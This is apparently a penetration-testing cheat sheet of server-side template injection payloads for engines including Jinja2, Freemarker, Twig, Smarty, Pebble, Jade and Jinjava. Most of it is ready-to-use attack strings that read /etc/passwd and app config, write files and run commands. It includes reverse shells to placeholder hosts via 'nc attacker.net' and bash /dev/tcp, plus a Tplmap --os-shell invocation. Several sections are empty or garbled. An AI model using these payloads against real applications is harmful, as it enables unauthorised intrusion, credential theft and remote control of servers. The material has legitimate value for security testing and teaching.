# Templates Injections
> Template injection allows an attacker to include template code into an existant (or not) template. A template engine makes designing HTML pages easier by using static template files which at runtime replaces variables/placeholders with actual values in the HTML pages
## Summary
* [Tools](#tools)
* [Methodology](#methodology)
* [Ruby](#ruby)
* [Basic injection](#basic-injection)
* [Retrieve /etc/passwd](#retrieve--etc-passwd)
* [List files and directories](#list-files-and-directories)
* [Java](#java)
* [Basic injection](#basic-injection)
* [Retrieve the system’s environment variables](retrieve-the-system-s-environment-variables)
* [Retrieve /etc/passwd](#retrieve--etc-passwd)
* [Twig](#twig)
* [Basic injection](#basic-injection)
* [Template format](#template-format)
* [Code execution](#code-execution)
* [Smarty](#smarty)
* [Freemarker](#freemarker)
* [Basic injection](#basic-injection)
* [Code execution](#code-execution)
* [Peeble](#peeble)
* [Basic injection](#basic-injection)
* [Code execution](#code-execution)
* [Jade / Codepen](#jade---codepen)
* [Velocity](#velocity)
* [Mako](#mako)
* [Jinja2](#jinja2)
* [Basic injection](#basic-injection)
* [Template format](#template-format)
* [Dump all used classes](#dump-all-used-classes)
* [Dump all config variables](#dump-all-config-variables)
* [Read remote file](#read-remote-file)
* [Write into remote file](#write-into-remote-file)
* [Remote Code Execution](#remote-code-execution)
* [Filter bypass](filter-bypass)
* [Jinjava](#jinjava)
* [Basic injection](#basic-injection)
* [Command execution](#command-execution)
* [References](#references)
## Tools
Recommended tool: [Tplmap](https://github.com/epinna/tplmap)
python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
python2.7 ./tplmap.py -u "*&comment=supercomment&link"
python2.7 ./tplmap.py -u "*&comment=A&link" --level 5 -e jade
## Methodology

## Ruby
### Basic injection
<%= 7 * 7 %>
### Retrieve /etc/passwd
<%= File.open('/etc/passwd').read %>
### List files and directories
<%= Dir.entries('/') %>
## Java
### Basic injection
### Retrieve the system’s environment variables
### Retrieve /etc/passwd
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
## Twig
### Basic injection
{{7*'7'}} would result in 49
### Template format
$output = $twig > render (
'Dear' . $_GET['custom_greeting'],
array("first_name" => $user.first_name)
$output = $twig > render (
"Dear {first_name}",
array("first_name" => $user.first_name)
### Code execution
## Smarty
{php}echo `id`;{/php}
## Freemarker
You can try your payloads at [https://try.freemarker.apache.org](https://try.freemarker.apache.org)
### Basic injection
The template can be `${3*3}` or the legacy `#{3*3}`
### Code execution
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
## Pebble
### Basic injection
{{ someString.toUPPERCASE() }}
### Code execution
{% set cmd = 'id' %}
{% set bytes = (1).TYPE
.readAllBytes() %}
{{ (1).TYPE
.newInstance(([bytes]).toArray()) }}
## Jade / Codepen
- var x = root.process
- x = x.mainModule.require
- x = x('child_process')
= x.exec('id | nc attacker.net 80')
## Velocity
#foreach($i in [1..$out.available()])
## Mako
import os
## Jinja2
[Official website](http://jinja.pocoo.org/)
> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
### Basic injection
{{7*'7'}} would result in 7777777
Jinja2 is used by Python Web Frameworks such as Django or Flask.
The above injections have been tested on Flask application.
### Template format
{% extends "layout.html" %}
{% block body %}
{% endblock %}
### Dump all used classes
{{ [].class.base.subclasses() }}
{{ ''.__class__.__mro__[2].__subclasses__() }}
### Dump all config variables
{% for key, value in config.iteritems() %}
{{ key|e }}
{{ value|e }}
{% endfor %}
### Read remote file
# ''.__class__.__mro__[2].__subclasses__()[40] = File class
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/tmp/flag").read() }}
### Write into remote file
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}
### Remote Code Execution
Listen for connexion
nv -lnvp 8000
#### Exploit the SSTI by calling subprocess.Popen.
:warning: the number 396 will vary depending of the application.
{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
#### Exploit the SSTI by calling Popen without guessing the offset
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
#### Exploit the SSTI by writing an evil config file.
# evil config
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }}
# load the evil config
{{ config.from_pyfile('/tmp/evilconfig.cfg') }}
# connect to evil host
{{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }}
### Filter bypass
Bypassing `_`
Bypassing `[` and `]`
Bypassing `|join`
## Jinjava
### Basic injection
{{'a'.toUpperCase()}} would result in 'A'
{{ request }} would return a request object like com.[...].context.TemplateContextRequest@23548206
Jinjava is an open source project developped by Hubspot, available at [https://github.com/HubSpot/jinjava/](https://github.com/HubSpot/jinjava/)
### Command execution
Fixed by https://github.com/HubSpot/jinjava/pull/230
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
